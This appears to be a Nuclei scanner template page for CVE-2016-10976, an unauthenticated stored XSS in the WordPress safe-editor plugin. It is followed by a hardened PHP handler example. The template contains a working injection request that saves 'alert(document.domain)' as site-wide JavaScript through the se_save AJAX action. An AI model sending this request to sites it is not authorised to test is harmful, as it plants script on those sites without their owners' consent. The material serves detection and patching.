Safe Editor Plugin < 1.2 - CSS/JS-injection
ID: CVE-2016-10976
Severity: medium
Author: Splint3r7
Tags: cve,cve2016,wordpress,wp,wp-plugin,xss,safe_editor
Description
The safe-editor plugin before 1.2 for WordPress has no se_save authentication, with resultant XSS.
YAML Source
```yaml
id: CVE-2016-10976

info:
  name: Safe Editor Plugin < 1.2 - CSS/JS-injection
  author: Splint3r7
  severity: medium
  description: |
    The safe-editor plugin before 1.2 for WordPress has no se_save authentication, with resultant XSS.
  remediation: |
    Update to the latest version of safe-editor plugin or apply the patch provided by the vendor.
  reference:
    - https://wordpress.org/plugins/safe-editor/#developers
    - https://github.com/ARPSyndicate/cvemon
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10976
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-10976
    cwe-id: CWE-79
    epss-score: 0.00096
    epss-percentile: 0.41555
    cpe: cpe:2.3:a:kodebyraaet:safe_editor:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: kodebyraaet
    product: safe_editor
    framework: wordpress
  tags: cve,cve2016,wordpress,wp,wp-plugin,xss,safe_editor

# Both requests must match: the save is accepted, then the value shows up on the site.
flow: http(1) && http(2)

http:
  # Request 1: call the se_save AJAX action without any session cookie.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=se_save&type=js&data=alert(document.domain)

    # Internal matcher: an empty 200 text/html response gates the second request.
    matchers:
      - type: dsl
        dsl:
          - 'len(body) == 0'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
        condition: and
        internal: true

  # Request 2: fetch the front page and look for the stored value.
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "alert(document.domain)", "save_edit_js")'
        condition: and
# digest: 4a0a0047304502200a5b2427640505cc9cd936660310eb64e0d3eec9d788b20436056a3af0a1df48022100d5b8fe619048e4d6517c5e1656c534db57d243cacc80535f283e3865eee66fd3:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-10976.yaml"
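The description attributes the XSS to se_save having no authentication. The sketch below is an added example, not the safe-editor plugin's code or its vendor patch, showing the checks a WordPress AJAX handler that stores site-wide CSS/JS would need. The `example_` function, nonce and option names are hypothetical; only the `se_save` action name and the `type`/`data` parameters come from the template above.

```php
<?php
// Added example: hypothetical hardened handler, not the plugin's own code.
// Names starting with example_ are assumptions made for illustration.

// Register only the logged-in hook. A handler that is also reachable through
// 'wp_ajax_nopriv_se_save' (or a bare init hook) can be called without a session.
add_action( 'wp_ajax_se_save', 'example_se_save' );

function example_se_save() {
    // 1. CSRF: require a valid nonce bound to this action.
    //    Passing false makes the call return instead of dying, so we can
    //    answer with an explicit 403.
    if ( ! check_ajax_referer( 'example_se_save', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // 2. Authorization: saving script that is printed on every page is
    //    equivalent to posting raw HTML, so require that capability.
    if ( ! current_user_can( 'unfiltered_html' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Input: accept only the two known types.
    $type = isset( $_POST['type'] )
        ? sanitize_key( wp_unslash( $_POST['type'] ) )
        : '';
    if ( ! in_array( $type, array( 'css', 'js' ), true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown type' ), 400 );
    }

    $data = isset( $_POST['data'] )
        ? (string) wp_unslash( $_POST['data'] )
        : '';

    // 4. Persist under a type-specific option (hypothetical option name).
    update_option( 'example_se_' . $type, $data, false );

    wp_send_json_success();
}
```

With these checks in place, the unauthenticated POST in the template's first request receives a 403 rather than an empty 200, so the internal matcher fails and the flow stops before the second request.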